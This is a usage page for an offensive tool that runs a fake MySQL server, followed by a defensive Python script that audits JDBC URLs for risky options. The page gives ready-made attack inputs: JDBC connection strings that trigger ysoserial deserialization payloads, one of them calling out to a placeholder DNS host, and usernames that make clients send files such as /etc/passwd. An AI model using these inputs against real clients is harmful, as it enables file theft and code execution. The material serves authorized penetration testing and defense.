MySQL Fake Server is a Python-based fake MySQL server designed to exploit MySQL client file reading and JDBC client Java deserialization vulnerabilities.
MySQL Fake Server is used to help with MySQL client file reading and JDBC client Java deserialization.
This tool is primarily used by penetration testers and red teamers to simulate a malicious MySQL server that can exploit file reading vulnerabilities in MySQL clients and trigger Java deserialization attacks via JDBC connections. It helps security professionals verify and demonstrate the impact of these vulnerabilities in controlled environments.
Requires Python 3 with no additional dependencies. Java and ysoserial are needed for deserialization payloads. Large file reading may consume significant memory as files are read fully before saving. Users should configure config.json carefully to match their target environment and payload requirements. Some MySQL clients may require authentication plugin adjustments (e.g., appending _clear) to successfully connect. Use responsibly in authorized penetration testing scenarios only.
Ensure Python 3 environment is installed
Clone or download the repository
Place ysoserial jar file (e.g., ysoserial-0.0.6-SNAPSHOT-all.jar) in the working directory
Modify config.json to configure file paths, ysoserial location, and payloads as needed
Run the fake server with the command: python server.py
python server.py
Start the MySQL Fake Server
jdbc:mysql://127.0.0.1:3306/test?autoDeserialize=true&queryInterceptors=com.mysql.cj.jdbc.interceptors.ServerStatusDiffInterceptor&user=yso_Jdk7u21_calc
Example JDBC connection string to trigger Java deserialization payload using ServerStatusDiffInterceptor gadget
jdbc:mysql://127.0.0.1:3306/test?detectCustomCollations=true&autoDeserialize=true&user=yso_URLDNS_http://yourdns.log.addr/
JDBC connection string example to trigger deserialization with detectCustomCollations option and URLDNS payload
Use username fileread_/etc/passwd to read /etc/passwd file from the client
Exploit MySQL client file reading vulnerability by specifying file path in username
Use username fileread_/etc/passwd_clear to switch to mysql_clear_password authentication plugin for Navicat compatibility
Bypass authentication plugin issues in Navicat by appending _clear to username
Modify config.json fileread section to predefine usernames and corresponding files to read
Configure file reading behavior for specific usernames
Modify config.json yso section to predefine ysoserial payload parameters for deserialization
Configure Java deserialization payloads for specific usernames
Ctrl+C
Stop the running MySQL Fake Server
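A defensive check related to the JDBC connection strings above, as an added example that is not part of the MySQL Fake Server project: it audits MySQL JDBC URLs (for instance, from application configuration) for the client options and username formats those strings rely on. `allowLoadLocalInfile` is Connector/J's local-file property and is not named on this page; the function and constant names are hypothetical.

```python
from urllib.parse import urlsplit, parse_qsl

# Connector/J properties whose "true" value lets the server side of a
# connection drive client behaviour. Names are matched case-insensitively,
# which is deliberately conservative for an audit.
RISKY_TRUE = {
    "autodeserialize": "objects sent by the server are Java-deserialized",
    "detectcustomcollations": "extra server result set is processed at connect",
    "allowloadlocalinfile": "server can ask the client to send local files",
}
RISKY_INTERCEPTOR = "serverstatusdiffinterceptor"
# Username prefixes this fake server reacts to (from the usage notes above).
TOOL_USER_PREFIXES = ("fileread_", "yso_")

# Constructed samples: the two connection strings above plus a benign URL.
SAMPLES = [
    "jdbc:mysql://127.0.0.1:3306/test?autoDeserialize=true&queryInterceptors="
    "com.mysql.cj.jdbc.interceptors.ServerStatusDiffInterceptor&user=yso_Jdk7u21_calc",
    "jdbc:mysql://127.0.0.1:3306/test?detectCustomCollations=true"
    "&autoDeserialize=true&user=yso_URLDNS_http://yourdns.log.addr/",
    "jdbc:mysql://db.example.internal:3306/app?allowLoadLocalInfile=false",
]


def audit_jdbc_url(url):
    """Return (property, reason) findings for one MySQL JDBC URL, in URL order."""
    if not url.lower().startswith("jdbc:mysql:"):
        return []
    # Drop the "jdbc:" prefix so urlsplit sees an ordinary mysql:// URL.
    query = urlsplit(url[len("jdbc:"):]).query
    findings = []
    for key, value in parse_qsl(query, keep_blank_values=True):
        k, v = key.lower(), value.strip().lower()
        if k in RISKY_TRUE and v == "true":
            findings.append((key, RISKY_TRUE[k]))
        elif k == "queryinterceptors" and RISKY_INTERCEPTOR in v:
            findings.append((key, "interceptor processes server status results"))
        elif k == "user" and v.startswith(TOOL_USER_PREFIXES):
            findings.append((key, "username matches this tool's trigger format"))
    return findings


if __name__ == "__main__":
    for sample in SAMPLES:
        print(sample.split("?")[0], audit_jdbc_url(sample))
```

A finding on `autoDeserialize` or `allowLoadLocalInfile` in production configuration is worth reviewing regardless of which server the client normally connects to.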